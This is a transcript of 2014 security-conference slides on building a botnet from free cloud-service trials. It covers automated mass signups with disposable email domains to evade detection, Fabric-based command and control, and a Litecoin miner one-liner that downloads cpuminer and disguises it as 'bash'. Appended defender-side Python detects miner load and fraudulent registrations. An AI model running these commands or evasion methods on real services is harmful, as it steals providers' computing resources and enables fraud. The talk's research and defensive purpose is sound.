cloudbots - harvesting crypto currency like a botnet farmer
DESCRIPTION
What happens when computer criminals start using friendly cloud services for malicious activities? In this presentation, we explore how to (ab)use free trials to get access to vast amounts of computing power, storage, and pre-made hacking environments. Oh! Also, we violate the hell out of some terms of service. We explore just how easy it is to generate massive amounts of unique email addresses in order to register free trial accounts, deploy code, and distribute commands (C2). We managed to build this cloud-based botnet all for the low cost of $0 and semi-legally. This botnet doesn't get flagged as malware, blocked by web filters, or get taken over. This is the stuff of nightmares! While riding on the fluffy Kumobot (kumo means cloud in Japanese), it was discovered that we were not the only ones doing this! With the rise of crypto currency we now face the impending rise of botnets that mine for digital gold on someone else's systems, with someone else's dime footing the electric bill. Through our efforts in building a cloud-based botnet we built enough tools to share a framework for penetration testers and security researchers. The anti-anti-automation framework will show those tasked with defense exactly what it looks like when their free trial gets assaulted.
TRANSCRIPT
![Page 1: CloudBots - Harvesting Crypto Currency Like a Botnet Farmer](https://reader035.vdocuments.site/reader035/viewer/2022081801/546e997aaf79597b298b57ce/html5/thumbnails/1.jpg)
CloudBots: Harvesting Crypto Coins Like a Botnet Farmer
2014 August 6
![Page 2: CloudBots - Harvesting Crypto Currency Like a Botnet Farmer](https://reader035.vdocuments.site/reader035/viewer/2022081801/546e997aaf79597b298b57ce/html5/thumbnails/2.jpg)
2
…and Violating Terms of Service
Building a Botnet with Free Cloud-based Services
![Page 3: CloudBots - Harvesting Crypto Currency Like a Botnet Farmer](https://reader035.vdocuments.site/reader035/viewer/2022081801/546e997aaf79597b298b57ce/html5/thumbnails/3.jpg)
3
Main Topics
• Could we build a botnet from freely available cloud services?
• Will we see the rise of more cloud based botnets?
• Should insufficient anti-automation be considered a top ten vulnerability?
What are these guys talking about?
Overview
![Page 4: CloudBots - Harvesting Crypto Currency Like a Botnet Farmer](https://reader035.vdocuments.site/reader035/viewer/2022081801/546e997aaf79597b298b57ce/html5/thumbnails/4.jpg)
4
Platform as a Service
Cloud PaaS
![Page 5: CloudBots - Harvesting Crypto Currency Like a Botnet Farmer](https://reader035.vdocuments.site/reader035/viewer/2022081801/546e997aaf79597b298b57ce/html5/thumbnails/5.jpg)
5
Platform as a Service
Free Cloud Services
<Insert with other providers later>
Reference: http://goo.gl/AZ4nYp
![Page 6: CloudBots - Harvesting Crypto Currency Like a Botnet Farmer](https://reader035.vdocuments.site/reader035/viewer/2022081801/546e997aaf79597b298b57ce/html5/thumbnails/6.jpg)
6
Development Environment as a Service
Free Cloud Services
![Page 7: CloudBots - Harvesting Crypto Currency Like a Botnet Farmer](https://reader035.vdocuments.site/reader035/viewer/2022081801/546e997aaf79597b298b57ce/html5/thumbnails/7.jpg)
AUTOMATION Scripting the Cloud
![Page 8: CloudBots - Harvesting Crypto Currency Like a Botnet Farmer](https://reader035.vdocuments.site/reader035/viewer/2022081801/546e997aaf79597b298b57ce/html5/thumbnails/8.jpg)
8
Automating Registration
• Hurdles
  - Email address confirmation
  - CAPTCHA
  - Phone/SMS
  - Credit Card
Usability vs Security
Cloud Providers (In)Security
![Page 9: CloudBots - Harvesting Crypto Currency Like a Botnet Farmer](https://reader035.vdocuments.site/reader035/viewer/2022081801/546e997aaf79597b298b57ce/html5/thumbnails/9.jpg)
9
Anti-Automation
Fraudulent Account Registration
More Anti-Automation
Chart: anti-automation measures required at registration, by provider (categories: email, CAPTCHA, credit card, phone; values shown: 66%, 33%; label: "Email Confirmation Only")
![Page 10: CloudBots - Harvesting Crypto Currency Like a Botnet Farmer](https://reader035.vdocuments.site/reader035/viewer/2022081801/546e997aaf79597b298b57ce/html5/thumbnails/10.jpg)
10
Anti-Automation Techniques
• Email address confirmation
• CAPTCHA
• Phone/SMS
• Credit Card
Usability vs Security
Cloud Providers (In)Security
![Page 11: CloudBots - Harvesting Crypto Currency Like a Botnet Farmer](https://reader035.vdocuments.site/reader035/viewer/2022081801/546e997aaf79597b298b57ce/html5/thumbnails/11.jpg)
11
![Page 12: CloudBots - Harvesting Crypto Currency Like a Botnet Farmer](https://reader035.vdocuments.site/reader035/viewer/2022081801/546e997aaf79597b298b57ce/html5/thumbnails/12.jpg)
12
Automated email processing
- Wildcard localpart: *@domain.com
- Extract important information from incoming emails
- Grep for confirmation token links and request them
Account registration
- Automatic request sent to account activation links
SMTP Services
Email Confirmation Token Processing
![Page 13: CloudBots - Harvesting Crypto Currency Like a Botnet Farmer](https://reader035.vdocuments.site/reader035/viewer/2022081801/546e997aaf79597b298b57ce/html5/thumbnails/13.jpg)
[email protected] Email Address Anatomy
![Page 14: CloudBots - Harvesting Crypto Currency Like a Botnet Farmer](https://reader035.vdocuments.site/reader035/viewer/2022081801/546e997aaf79597b298b57ce/html5/thumbnails/14.jpg)
14
Using the Google AppEngine InboundMailHandler
- [email protected]
- [email protected]
- [email protected]
- [email protected]
- [email protected]
- [email protected]
- [email protected]
- [email protected]
- [email protected]
- [email protected]
Google App Engine
Detection issues
![Page 15: CloudBots - Harvesting Crypto Currency Like a Botnet Farmer](https://reader035.vdocuments.site/reader035/viewer/2022081801/546e997aaf79597b298b57ce/html5/thumbnails/15.jpg)
15
Unlimited usernames
- Prevent pattern recognition
- Pull from real world examples: [local-part from dump]@domain.tld
Realistic Randomness
Real Email Addresses
![Page 16: CloudBots - Harvesting Crypto Currency Like a Botnet Farmer](https://reader035.vdocuments.site/reader035/viewer/2022081801/546e997aaf79597b298b57ce/html5/thumbnails/16.jpg)
16
Unlimited domains
- freedns.afraid.org
- Prevent detection
- Thousands of unique email domains
SMTP Services
Plethora of Email Addresses
![Page 17: CloudBots - Harvesting Crypto Currency Like a Botnet Farmer](https://reader035.vdocuments.site/reader035/viewer/2022081801/546e997aaf79597b298b57ce/html5/thumbnails/17.jpg)
17
Unlimited email addresses
Free DNS Subdomains
![Page 18: CloudBots - Harvesting Crypto Currency Like a Botnet Farmer](https://reader035.vdocuments.site/reader035/viewer/2022081801/546e997aaf79597b298b57ce/html5/thumbnails/18.jpg)
18
What do we need?
• Free email relay
  - Free MX registration
• Process wildcards
  - *@domain.tld
• Send unlimited messages
  - Unrestricted SMTP to HTTP POST/JSON requests
Free Signups
Receiving Email and Processing
![Page 19: CloudBots - Harvesting Crypto Currency Like a Botnet Farmer](https://reader035.vdocuments.site/reader035/viewer/2022081801/546e997aaf79597b298b57ce/html5/thumbnails/19.jpg)
19
Inbound Mail As A Service
Free Cloud Services
<Insert with other providers later>
Reference: http://goo.gl/yqoh6U
![Page 20: CloudBots - Harvesting Crypto Currency Like a Botnet Farmer](https://reader035.vdocuments.site/reader035/viewer/2022081801/546e997aaf79597b298b57ce/html5/thumbnails/20.jpg)
20
Automated email processing
- Extract important information from incoming emails
- Grep for confirmation token links and request them
Account registration
- Automatic request sent to account activation links
SMTP Services
Email Confirmation Token Processing
Reference: http://bishopfox.github.io/anti-anti-automation/
![Page 21: CloudBots - Harvesting Crypto Currency Like a Botnet Farmer](https://reader035.vdocuments.site/reader035/viewer/2022081801/546e997aaf79597b298b57ce/html5/thumbnails/21.jpg)
21
<Insert wall of random email addresses>
Realistic Randomness
Unique Email Addresses Avoid Pattern Recognition
![Page 22: CloudBots - Harvesting Crypto Currency Like a Botnet Farmer](https://reader035.vdocuments.site/reader035/viewer/2022081801/546e997aaf79597b298b57ce/html5/thumbnails/22.jpg)
DEMONSTRATION Automatic Account Creation
![Page 23: CloudBots - Harvesting Crypto Currency Like a Botnet Farmer](https://reader035.vdocuments.site/reader035/viewer/2022081801/546e997aaf79597b298b57ce/html5/thumbnails/23.jpg)
23
Automated Registration Workflow
Email Addresses
![Page 24: CloudBots - Harvesting Crypto Currency Like a Botnet Farmer](https://reader035.vdocuments.site/reader035/viewer/2022081801/546e997aaf79597b298b57ce/html5/thumbnails/24.jpg)
24
MongoDB
• MongoLab
• MongoHQ
Keeping track of all accounts
Storing Account Information
![Page 25: CloudBots - Harvesting Crypto Currency Like a Botnet Farmer](https://reader035.vdocuments.site/reader035/viewer/2022081801/546e997aaf79597b298b57ce/html5/thumbnails/25.jpg)
FUNTIVITIES Botnets Are Fun!
![Page 26: CloudBots - Harvesting Crypto Currency Like a Botnet Farmer](https://reader035.vdocuments.site/reader035/viewer/2022081801/546e997aaf79597b298b57ce/html5/thumbnails/26.jpg)
26
What can we do?
• Distributed Network Scanning
• Distributed Password Cracking
• DDoS
• Click-fraud
• Crypto Currency Mining
• Data Storage
Now we have a botnet! Fun!
Botnet Activities
![Page 27: CloudBots - Harvesting Crypto Currency Like a Botnet Farmer](https://reader035.vdocuments.site/reader035/viewer/2022081801/546e997aaf79597b298b57ce/html5/thumbnails/27.jpg)
27
Refer Fake Friends
Unlimited Storage Space
![Page 28: CloudBots - Harvesting Crypto Currency Like a Botnet Farmer](https://reader035.vdocuments.site/reader035/viewer/2022081801/546e997aaf79597b298b57ce/html5/thumbnails/28.jpg)
28
Refer Fake Friends
Unlimited Storage Space
![Page 29: CloudBots - Harvesting Crypto Currency Like a Botnet Farmer](https://reader035.vdocuments.site/reader035/viewer/2022081801/546e997aaf79597b298b57ce/html5/thumbnails/29.jpg)
29
What are we using?
• Fabric - Fabric is a Python library and command-line tool for streamlining the use of SSH for application deployment or systems administration tasks.
• fab check_hosts -P -z 20
• fab run_command
Botnet C2
Command & Control
![Page 30: CloudBots - Harvesting Crypto Currency Like a Botnet Farmer](https://reader035.vdocuments.site/reader035/viewer/2022081801/546e997aaf79597b298b57ce/html5/thumbnails/30.jpg)
30
Unique Amazon IP Addresses
Distributed Command
[na1.cloudbox.net:2352]: curl http://icanhazip.com
4.109.182.13
[eu1.cloudbox.net:3127]: curl http://icanhazip.com
126.34.56.254
[na1.cloudbox.net:10660]: curl http://icanhazip.com
58.251.42.128
[na1.cloudbox.net:15627]: curl http://icanhazip.com
74.216.236.72
[na1.cloudbox.net:8000]: curl http://icanhazip.com
28.228.253.19
[na1.cloudbox.net:4028]: curl http://icanhazip.com
64.216.37.252
![Page 31: CloudBots - Harvesting Crypto Currency Like a Botnet Farmer](https://reader035.vdocuments.site/reader035/viewer/2022081801/546e997aaf79597b298b57ce/html5/thumbnails/31.jpg)
31
Make money, money
• Deploying miners
• One command for $$$
All your processors are belong to us
Litecoin Mining
if [ ! -f bash ]; then wget http://sourceforge.net/projects/cpuminer/files/pooler-cpuminer-2.3.2-linux-x86_64.tar.gz && tar zxfv pooler-cpuminer-2.3.2-linux-x86_64.tar.gz && rm pooler-cpuminer-2.3.2-linux-x86_64.tar.gz && mv minerd bash; fi; screen ./bash --url=stratum+tcp://pool.mine-litecoin.com --userpass=ninja.47:47; rm bash
![Page 32: CloudBots - Harvesting Crypto Currency Like a Botnet Farmer](https://reader035.vdocuments.site/reader035/viewer/2022081801/546e997aaf79597b298b57ce/html5/thumbnails/32.jpg)
32
Load After Crypto Currency Mining
Distributed Command
ID | Host                   | Status
----------------------------------------
0  | na1.cloudbox.net:1678  | 2 users, load average: 37.08, 37.60, 32.51
1  | na1.cloudbox.net:15121 | 1 user, load average: 16.35, 15.35, 12.00
2  | na1.cloudbox.net:11631 | 1 user, load average: 19.65, 18.46, 14.38
3  | na1.cloudbox.net:4358  | 2 users, load average: 23.10, 22.91, 18.95
4  | na1.cloudbox.net:1212  | 1 user, load average: 19.60, 18.47, 14.41
5  | na1.cloudbox.net:5841  | 1 user, load average: 19.97, 18.61, 14.52
6  | eu1.cloudbox.net:3025  | 1 user, load average: 19.27, 18.37, 14.33
7  | eu1.cloudbox.net:6892  | 2 users, load average: 19.65, 18.46, 14.38
8  | eu1.cloudbox.net:2038  | 1 user, load average: 18.85, 17.43, 13.45
9  | na1.cloudbox.net:5235  | 1 user, load average: 18.55, 17.32, 13.38
10 | na1.cloudbox.net:1122  | 1 user, load average: 26.04, 25.57, 20.02
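The load listing above is also what a provider's own monitoring sees when a free-tier host is running a miner: all three load averages sit far above the core count and stay there. The following Python is an added defender-side example, not code from the talk or from the Bishop Fox framework. It parses the "ID | Host | Status" listing and flags hosts with sustained saturation; the one-CPU-per-host figure (ASSUMED_CPUS), the 4x ratio and the idle baseline row with id 11 are constructed assumptions not stated on the slide.

```python
import re
from dataclasses import dataclass

# Assumed number of CPUs on a free-tier host; the slide does not state it (assumption).
ASSUMED_CPUS = 1

# Rows transcribed from the "Load After Crypto Currency Mining" slide, plus one
# constructed baseline row (id 11) for an idle host, which the slide does not contain.
SAMPLE_TABLE = """\
ID | Host | Status
----------------------------------------
0 | na1.cloudbox.net:1678 | 2 users, load average: 37.08, 37.60, 32.51
1 | na1.cloudbox.net:15121| 1 user, load average: 16.35, 15.35, 12.00
2 | na1.cloudbox.net:11631| 1 user, load average: 19.65, 18.46, 14.38
3 | na1.cloudbox.net:4358 | 2 users, load average: 23.10, 22.91, 18.95
4 | na1.cloudbox.net:1212 | 1 user, load average: 19.60, 18.47, 14.41
5 | na1.cloudbox.net:5841 | 1 user, load average: 19.97, 18.61, 14.52
6 | eu1.cloudbox.net:3025 | 1 user, load average: 19.27, 18.37, 14.33
7 | eu1.cloudbox.net:6892 | 2 users, load average: 19.65, 18.46, 14.38
8 | eu1.cloudbox.net:2038 | 1 user, load average: 18.85, 17.43, 13.45
9 | na1.cloudbox.net:5235 | 1 user, load average: 18.55, 17.32, 13.38
10 | na1.cloudbox.net:1122 | 1 user, load average: 26.04, 25.57, 20.02
11 | na1.cloudbox.net:9999 | 1 user, load average: 0.12, 0.08, 0.05
"""

# One data row: id, host:port, then the tail of `uptime` output.
ROW_RE = re.compile(
    r"^\s*(?P<id>\d+)\s*\|\s*(?P<host>[^|\s]+)\s*\|\s*(?P<users>\d+) users?, "
    r"load average: (?P<l1>[\d.]+), (?P<l5>[\d.]+), (?P<l15>[\d.]+)\s*$"
)


@dataclass
class HostLoad:
    host: str
    users: int
    load1: float
    load5: float
    load15: float


def parse_load_table(text):
    """Parse the Fabric-style 'ID | Host | Status' listing into HostLoad records."""
    rows = []
    for line in text.splitlines():
        m = ROW_RE.match(line)
        if m is None:
            continue  # header and separator lines carry no host data
        rows.append(HostLoad(m["host"], int(m["users"]),
                             float(m["l1"]), float(m["l5"]), float(m["l15"])))
    return rows


def flag_sustained_cpu_hogs(rows, cpus=ASSUMED_CPUS, ratio=4.0):
    """Return hosts whose 1-, 5- and 15-minute load averages all exceed ratio * cpus.

    A build or a traffic spike lifts the 1-minute value and then decays; a miner
    keeps every core saturated, so all three averages stay far above the core count.
    """
    return [r.host for r in rows
            if min(r.load1, r.load5, r.load15) > ratio * cpus]


if __name__ == "__main__":
    for host in flag_sustained_cpu_hogs(parse_load_table(SAMPLE_TABLE)):
        print("sustained CPU saturation:", host)
```

Requiring all three averages to exceed the threshold is what separates a miner from a one-off compile or a short scan; in practice the threshold would come from the host's real core count rather than the assumed value used here.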
![Page 33: CloudBots - Harvesting Crypto Currency Like a Botnet Farmer](https://reader035.vdocuments.site/reader035/viewer/2022081801/546e997aaf79597b298b57ce/html5/thumbnails/33.jpg)
33
All your processors are belong to us
Litecoin Mining
![Page 34: CloudBots - Harvesting Crypto Currency Like a Botnet Farmer](https://reader035.vdocuments.site/reader035/viewer/2022081801/546e997aaf79597b298b57ce/html5/thumbnails/34.jpg)
CLOUD BREAKOUT Bypassing Restrictions
![Page 35: CloudBots - Harvesting Crypto Currency Like a Botnet Farmer](https://reader035.vdocuments.site/reader035/viewer/2022081801/546e997aaf79597b298b57ce/html5/thumbnails/35.jpg)
DETECTION No one can catch a ninja!
![Page 36: CloudBots - Harvesting Crypto Currency Like a Botnet Farmer](https://reader035.vdocuments.site/reader035/viewer/2022081801/546e997aaf79597b298b57ce/html5/thumbnails/36.jpg)
36
Automatic Backups
• Propagate to other similar services - e.g. MongoLab <-> MongoHQ
• Infrastructure across multiple service providers
• Easily migrated
Armadillo Up ™
Disaster Recovery Plan
![Page 37: CloudBots - Harvesting Crypto Currency Like a Botnet Farmer](https://reader035.vdocuments.site/reader035/viewer/2022081801/546e997aaf79597b298b57ce/html5/thumbnails/37.jpg)
RISING TREND Active Attacks
![Page 38: CloudBots - Harvesting Crypto Currency Like a Botnet Farmer](https://reader035.vdocuments.site/reader035/viewer/2022081801/546e997aaf79597b298b57ce/html5/thumbnails/38.jpg)
38
Adaptation
Cloud Provider Registration
![Page 39: CloudBots - Harvesting Crypto Currency Like a Botnet Farmer](https://reader035.vdocuments.site/reader035/viewer/2022081801/546e997aaf79597b298b57ce/html5/thumbnails/39.jpg)
39
Adaptation
Cloud Provider Registration
![Page 40: CloudBots - Harvesting Crypto Currency Like a Botnet Farmer](https://reader035.vdocuments.site/reader035/viewer/2022081801/546e997aaf79597b298b57ce/html5/thumbnails/40.jpg)
40
Adaptation
Cloud Provider Registration
![Page 41: CloudBots - Harvesting Crypto Currency Like a Botnet Farmer](https://reader035.vdocuments.site/reader035/viewer/2022081801/546e997aaf79597b298b57ce/html5/thumbnails/41.jpg)
41
Crypto Coins & DDoS
Clouds Under Siege
![Page 42: CloudBots - Harvesting Crypto Currency Like a Botnet Farmer](https://reader035.vdocuments.site/reader035/viewer/2022081801/546e997aaf79597b298b57ce/html5/thumbnails/42.jpg)
42
Crypto Coins & DDoS
Clouds Under Siege
![Page 43: CloudBots - Harvesting Crypto Currency Like a Botnet Farmer](https://reader035.vdocuments.site/reader035/viewer/2022081801/546e997aaf79597b298b57ce/html5/thumbnails/43.jpg)
PROTECTION Bot Busters
![Page 44: CloudBots - Harvesting Crypto Currency Like a Botnet Farmer](https://reader035.vdocuments.site/reader035/viewer/2022081801/546e997aaf79597b298b57ce/html5/thumbnails/44.jpg)
44
What can we do?
• Logic puzzles
• Sound output
• Credit card validation
• Live operators
• Limited-use account
• Heuristic checks
• Federated identity systems
Usability vs Security
Protection
Reference: http://www.w3.org/TR/2003/WD-turingtest-20031105/#solutions
![Page 45: CloudBots - Harvesting Crypto Currency Like a Botnet Farmer](https://reader035.vdocuments.site/reader035/viewer/2022081801/546e997aaf79597b298b57ce/html5/thumbnails/45.jpg)
45
What should we do?
• Analyzing properties of Sybil accounts
• Analyzing the arrival rate and distribution of accounts
• Flag accounts registered with emails from newly registered domain names
• Email verification
• CAPTCHAs
• IP Blacklisting
• Phone/SMS verification
• Automatic pattern recognition
At Abuse vs At Registration
Protection
Reference: https://www.usenix.org/system/files/conference/usenixsecurity13/sec13-paper_thomas.pdf
![Page 46: CloudBots - Harvesting Crypto Currency Like a Botnet Farmer](https://reader035.vdocuments.site/reader035/viewer/2022081801/546e997aaf79597b298b57ce/html5/thumbnails/46.jpg)
46
At Abuse vs At Registration
Protection
Advanced techniques
• Signup flow events
  - Detect common activities after signup
• User-agent
  - A registration bot may generate a different user-agent for each signup or use uncommon user-agents
• Form submission timing
  - A bot that doesn't mimic human behavior by performing certain actions too quickly can be detected
Reference: https://www.usenix.org/system/files/conference/usenixsecurity13/sec13-paper_thomas.pdf
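The two protection slides list registration-time signals a provider can score before an account is ever used: arrival rate and distribution, email domains that were registered only days ago, one source rotating through user-agents, and forms submitted faster than a person could fill them. The following Python is an added example of those four checks run over sample signup records; it is not code from the talk, the Bishop Fox framework or the referenced USENIX paper. The signup events, the DOMAIN_CREATED table (standing in for a WHOIS lookup) and every threshold are constructed assumptions.

```python
from collections import defaultdict
from datetime import datetime

# --- Constructed sample data (not from the talk) ---------------------------
# One record per registration attempt: account id, timestamp, source IP,
# User-Agent header, registered email, and milliseconds between the signup
# form being served and being submitted.
SIGNUPS = [
    {"account": "a1", "ts": "2014-08-06T10:00:00", "ip": "203.0.113.5",
     "ua": "Mozilla/5.0 (Windows NT 6.1) Chrome/36.0",
     "email": "alice@example.com", "form_ms": 8500},
    {"account": "b1", "ts": "2014-08-06T10:05:00", "ip": "198.51.100.7",
     "ua": "Python-urllib/2.7", "email": "j.smith@freshdomain.example", "form_ms": 300},
    {"account": "b2", "ts": "2014-08-06T10:05:12", "ip": "198.51.100.7",
     "ua": "curl/7.35.0", "email": "m.jones@freshdomain.example", "form_ms": 280},
    {"account": "b3", "ts": "2014-08-06T10:05:25", "ip": "198.51.100.7",
     "ua": "Mozilla/4.0 (compatible; MSIE 5.0)",
     "email": "k.lee@freshdomain.example", "form_ms": 310},
    {"account": "b4", "ts": "2014-08-06T10:05:40", "ip": "198.51.100.7",
     "ua": "Wget/1.15", "email": "p.wong@freshdomain.example", "form_ms": 295},
    {"account": "c1", "ts": "2014-08-06T11:30:00", "ip": "192.0.2.9",
     "ua": "Mozilla/5.0 (X11; Linux x86_64) Firefox/31.0",
     "email": "carol@newco.example", "form_ms": 5200},
]

# Constructed stand-in for a WHOIS/registrar lookup: domain -> creation date.
DOMAIN_CREATED = {
    "example.com": "1995-08-14",
    "freshdomain.example": "2014-08-05",
    "newco.example": "2014-07-01",
}


def parse_ts(s):
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%S")


def email_domain_age_days(email, observed_at):
    """Days between the email domain's registration and the signup; None if unknown."""
    domain = email.rsplit("@", 1)[-1].lower()
    created = DOMAIN_CREATED.get(domain)
    if created is None:
        return None
    return (observed_at - datetime.strptime(created, "%Y-%m-%d")).days


def score_signups(events, *, new_domain_days=30, min_form_ms=2000,
                  ua_churn_min=3, burst_window_s=60, burst_max=3):
    """Return {account: [reasons]} after applying four registration-time heuristics."""
    by_ip = defaultdict(list)
    for e in events:
        by_ip[e["ip"]].append(e)

    reasons = {e["account"]: [] for e in events}
    for e in events:
        t = parse_ts(e["ts"])
        # 1. Form submitted faster than a person could read and fill it.
        if e["form_ms"] < min_form_ms:
            reasons[e["account"]].append("fast_form")
        # 2. Email domain registered very recently (bulk or throwaway domains).
        age = email_domain_age_days(e["email"], t)
        if age is not None and age < new_domain_days:
            reasons[e["account"]].append("new_domain")
        peers = by_ip[e["ip"]]
        # 3. One source presenting many different User-Agent strings.
        if len({p["ua"] for p in peers}) >= ua_churn_min:
            reasons[e["account"]].append("ua_churn")
        # 4. Arrival rate: more signups from one source than the window allows.
        near = [p for p in peers
                if abs((parse_ts(p["ts"]) - t).total_seconds()) <= burst_window_s]
        if len(near) > burst_max:
            reasons[e["account"]].append("burst")
    return reasons


if __name__ == "__main__":
    for acct, why in score_signups(SIGNUPS).items():
        print(acct, "OK" if not why else "FLAG " + ",".join(why))
```

The domain-age check deliberately returns None for unknown domains so that a missing lookup is not itself treated as a signal; c1 shows the boundary case of a domain 36 days old, which stays unflagged at the 30-day threshold. Scoring several weak signals together, rather than blocking on any one of them, is what keeps the false-positive rate tolerable for legitimate signups like a1.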